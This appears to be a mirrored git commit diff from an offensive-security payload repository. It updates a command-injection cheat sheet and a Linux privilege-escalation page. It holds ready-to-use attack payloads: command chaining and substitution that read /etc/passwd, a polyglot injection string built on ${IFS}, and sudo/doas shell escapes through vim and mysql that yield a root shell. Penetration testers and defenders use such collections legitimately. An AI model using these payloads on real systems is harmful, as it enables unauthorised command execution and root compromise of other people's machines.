mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-25 05:45:27 +00:00
Command injection renamed + sudo/doas privesc
This commit is contained in:
parent
4db45a263a
commit
e07a654080
@ -1,11 +1,11 @@
|
|||||||
# Remote Commands Execution
|
# Command Injection
|
||||||
|
|
||||||
|
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
|
||||||
|
|
||||||
Remote Commands execution is a security vulnerability that allows an attacker to execute commands from a remote server.
|
|
||||||
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
|
||||||
|
|
||||||
## Exploits
|
## Exploits
|
||||||
|
|
||||||
Normal Commands execution, execute the command and voila :p
|
Normal command, execute the command and voila :p
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
cat /etc/passwd
|
cat /etc/passwd
|
||||||
@ -17,7 +17,7 @@ sys:x:3:3:sys:/dev:/bin/sh
|
|||||||
|
|
||||||
Commands execution by chaining commands
|
Commands execution by chaining commands
|
||||||
|
|
||||||
```powershell
|
```bash
|
||||||
original_cmd_by_server; ls
|
original_cmd_by_server; ls
|
||||||
original_cmd_by_server && ls
|
original_cmd_by_server && ls
|
||||||
original_cmd_by_server | ls
|
original_cmd_by_server | ls
|
||||||
@ -26,7 +26,7 @@ original_cmd_by_server || ls Only if the first cmd fail
|
|||||||
|
|
||||||
Commands execution inside a command
|
Commands execution inside a command
|
||||||
|
|
||||||
```powershell
|
```bash
|
||||||
original_cmd_by_server `cat /etc/passwd`
|
original_cmd_by_server `cat /etc/passwd`
|
||||||
original_cmd_by_server $(cat /etc/passwd)
|
original_cmd_by_server $(cat /etc/passwd)
|
||||||
```
|
```
|
||||||
@ -167,6 +167,17 @@ Online tools to check for DNS based data exfiltration:
|
|||||||
- dnsbin.zhack.ca
|
- dnsbin.zhack.ca
|
||||||
- pingb.in
|
- pingb.in
|
||||||
|
|
||||||
|
## Polyglot command injection
|
||||||
|
|
||||||
|
```bash
|
||||||
|
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||||
|
|
||||||
|
e.g:
|
||||||
|
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||||
|
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||||
|
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
@ -132,8 +132,31 @@ Edit capabilites
|
|||||||
setcap cap_net_raw+p /bin/ping # add
|
setcap cap_net_raw+p /bin/ping # add
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SUDO
|
||||||
|
|
||||||
## GTFOBins
|
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ sudo -l
|
||||||
|
|
||||||
|
User demo may run the following commands on crashlab:
|
||||||
|
(root) NOPASSWD: /usr/bin/vim
|
||||||
|
```
|
||||||
|
|
||||||
|
In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo vim -c '!sh'
|
||||||
|
sudo -u root vim -c '!sh'
|
||||||
|
```
|
||||||
|
|
||||||
|
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
|
||||||
|
|
||||||
|
```bash
|
||||||
|
permit nopass demo as root cmd vim
|
||||||
|
```
|
||||||
|
|
||||||
|
### GTFOBins
|
||||||
|
|
||||||
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
|
||||||
|
|
||||||
@ -143,6 +166,7 @@ The project collects legitimate functions of Unix binaries that can be abused to
|
|||||||
> sudo mysql -e '\! /bin/sh'
|
> sudo mysql -e '\! /bin/sh'
|
||||||
> strace -o /dev/null /bin/sh
|
> strace -o /dev/null /bin/sh
|
||||||
|
|
||||||
|
|
||||||
## Groups
|
## Groups
|
||||||
|
|
||||||
### Docker
|
### Docker
|
||||||
|
Loading…
Reference in New Issue
Block a user